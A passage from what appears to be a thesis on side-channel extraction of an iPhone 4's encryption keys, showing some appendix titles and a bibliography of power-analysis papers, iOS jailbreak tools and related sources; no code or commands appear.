5.1 Using the GID key to get the kernel encryption key for iPhone3,2 iOS 7.1.2 build 11D257

B.1 Patching boot loader images
B.2 Loading patched boot loader images and payload
B.3 Combining sections to raw executable
B.4 Source code for device payload
B.5 OpenCL source code for leaking power model

Bibliography

[AARR03] Dakshi Agrawal, Bruce Archambeault, Josyula R. Rao, and Pankaj Rohatgi. The EM side-channel(s). In Burton S. Kaliski, Çetin K. Koç, and Christof Paar, editors, Cryptographic Hardware and Embedded Systems - CHES 2002, pages 29–45, Berlin, Heidelberg, 2003. Springer Berlin Heidelberg.

[App] Apple. OS X ABI Mach-O File Format Reference. https://github.com/aidansteele/osx-abi-macho-file-format-reference/blob/master/Mach-O_File_Format.pdf. Accessed on 2020-04-19.

[ARM] ARM. ARM7TDMI Technical Reference Manual, revision: r4p1. http://infocenter.arm.com/help/topic/com.arm.doc.ddi0210c/DDI0210B.pdf. Accessed on 2020-05-08.

[@ax] @axi0mX. ipwndfu - github. https://github.com/axi0mX/ipwndfu. Accessed on 2020-05-08.

[BCHC09] Jacob Benesty, Jingdong Chen, Yiteng Huang, and Israel Cohen. Pearson Correlation Coefficient, pages 1–4. Springer Berlin Heidelberg, Berlin, Heidelberg, 2009.

[cla] Clang compiler. https://clang.llvm.org/. Accessed on 2020-04-19.

[Coh03] Bram Cohen. Incentives build robustness in bittorrent. http://citeseer.ist.psu.edu/cohen03incentives.html, 2003.

[@de16] @derrek, @nedwill, @naehrwert. Nintendo Hacking 2016. https://media.ccc.de/v/33c3-8344-nintendo_hacking_2016#t=1101, 2016.

[DR02] Joan Daemen and Vincent Rijmen. The Design of Rijndael: AES - The Advanced Encryption Standard. 2002.

[Ess] Stefan Esser. iPhone UART cable. https://media.blackhat.com/bh-us-11/Esser/BH_US_11_Esser_Exploiting_The_iOS_Kernel_Slides.pdf. Accessed on 2020-04-19.

[Fra] Steven De Franco. iBoot32Patcher - github. https://github.com/iH8sn0w/iBoot32Patcher. Accessed on 2020-04-19.

[FT2] FT232RL USB to Serial Breakout Board - robotshop. https://www.robotshop.com/en/ft232rl-usb-serial-breakout-board.html. Accessed on 2020-04-19.

[Hil] Joshua Hill. SHAttered Dreams - Adventures in BootROM Land. http://conference.hitb.org/hitbsecconf2013kul/materials/D2T1%20-%20Joshua%20%27p0sixninja%27%20Hill%20-%20SHAttered%20Dreams.pdf. Accessed on 2020-04-19.

[Inta] The Intercept. CIA leaked document decap. https://theintercept.com/document/2015/03/10/secure-key-extraction-physical-de-processing-apples-a4-processor/. Accessed on 2020-04-15.

[Intb] The Intercept. CIA leaked document DPA. https://theintercept.com/document/2015/03/10/differential-power-analysis-apple-a4-processor/. Accessed on 2020-04-15.

[Intc] The Intercept. The CIA campaign to steal Apple’s secrets. https://theintercept.com/2015/03/10/ispy-cia-campaign-steal-apples-secrets/. Accessed on 2020-04-15.

[ios] iOS Security - May 2012. https://github.com/0xmachos/iOS-Security-Guides/blob/master/iOS_Security_Guide_May12.pdf. Accessed on 2020-04-19.

[joh] johang. btfs - github. https://github.com/johang/btfs. Accessed on 2020-04-19.

[Khr11] Khronos OpenCL Working Group. The OpenCL Specification, Version 1.1, 2011.

[KJJ99] Paul Kocher, Joshua Jaffe, and Benjamin Jun. Differential power analysis. In Michael Wiener, editor, Advances in Cryptology - CRYPTO ’99, pages 388–397, Berlin, Heidelberg, 1999. Springer Berlin Heidelberg.

[Lev] Jonathan Levin. jtool. http://www.newosxbook.com/tools/jtool.html. Accessed on 2020-04-19.

[liba] libfuse. libfuse - github. https://github.com/libfuse/libfuse. Accessed on 2020-04-19.

[libb] libimobiledevice. libirecovery - github. https://github.com/libimobiledevice/libirecovery. Accessed on 2020-04-19.

[Lom11] Chris Lomont. Introduction to Intel Advanced Vector Extensions. Intel white paper. https://software.intel.com/content/dam/develop/external/us/en/documents/intro-to-intel-avx-183287.pdf, 2011.

[Lu19] Yifan Lu. Injecting software vulnerabilities with voltage glitching. https://arxiv.org/pdf/1903.08102.pdf, 2019.

[MKP12] Amir Moradi, Markus Kasper, and Christof Paar. Black-box side-channel attacks highlight the importance of countermeasures. In Orr Dunkelman, editor, Topics in Cryptology – CT-RSA 2012, pages 1–18, Berlin, Heidelberg, 2012. Springer Berlin Heidelberg.

[MMP11] A. Moradi, O. Mischke, and C. Paar. Practical evaluation of DPA countermeasures on reconfigurable hardware. In 2011 IEEE International Symposium on Hardware-Oriented Security and Trust, pages 154–160, 2011.

[MRSS18] Amir Moradi, Bastian Richter, Tobias Schneider, and François-Xavier Standaert. Leakage detection with the χ²-test. IACR Transactions on Cryptographic Hardware and Embedded Systems, 2018(1):209–237, Feb. 2018.

[NVI10] NVIDIA Corporation. NVIDIA CUDA C programming guide, 2010. Version 3.2.

[pod] PodBreakout - sparkfun. https://www.sparkfun.com/products/retired/10645. Accessed on 2020-04-19.

[SM15] Tobias Schneider and Amir Moradi. Leakage assessment methodology - a clear roadmap for side-channel evaluations. Cryptology ePrint Archive, Report 2015/207, 2015. https://eprint.iacr.org/2015/207.

[SMG15] Tobias Schneider, Amir Moradi, and Tim Güneysu. Robust and one-pass parallel computation of correlation-based attacks at arbitrary order - extended version. Cryptology ePrint Archive, Report 2015/571, 2015. https://eprint.iacr.org/2015/571.

[tea] Chronic-Dev team. Cyanide /ibss payload development toolkit - github. https://github.com/Chronic-Dev/cyanide. Accessed on 2020-04-19.

[Thea] The iPhone Wiki. Devicetree. https://www.theiphonewiki.com/wiki/DeviceTree. Accessed on 2020-04-15.

[Theb] The iPhone Wiki. GID Key. https://www.theiphonewiki.com/wiki/GID_Key. Accessed on 2020-04-15.

[Thec] The iPhone Wiki. IMG3 File Format. https://www.theiphonewiki.com/wiki/IMG3_File_Format. Accessed on 2020-04-15.

[Thed] The iPhone Wiki. limera1n exploit. https://www.theiphonewiki.com/wiki/Limera1n_Exploit. Accessed on 2020-04-15.

[Thee] The iPhone Wiki. Sochi 11D257 (iPhone3,2) decryption keys. https://www.theiphonewiki.com/wiki/Sochi_11D257_(iPhone3,2). Accessed on 2020-04-19.

[@ti] @tihmstar. Modern post exploitation techniques. http://blog.tihmstar.net/2018/01/modern-post-exploitation-techniques.html. Accessed on 2020-04-19.

[Wan] David Wang. xpwn - github. https://github.com/planetbeing/xpwn. Accessed on 2020-04-19.

[Wel47] B. L. Welch. The generalization of ‘student’s’ problem when several different population variances are involved. Biometrika, 34(1/2):28–35, 1947.

[WFE] William F. Ehrsam, Carl H. W. Meyer, John L. Smith, and Walter L. Tuchman. Message verification and transmission error detection by block chaining.

[Wika] Wikipedia. CMOS inverter image. https://en.wikipedia.org/wiki/CMOS#/media/File:CMOS_inverter.svg. Accessed on 2020-04-19.

[Wikb] Wikipedia. Logic gates. https://en.wikipedia.org/wiki/Glitch_removal#/media/File:Digital_circuit.JPG. Accessed on 2020-04-19.

[Xco] Xcode - . https://apps.apple.com/us/app/xcode/id497799835. Accessed on 2020-04-19.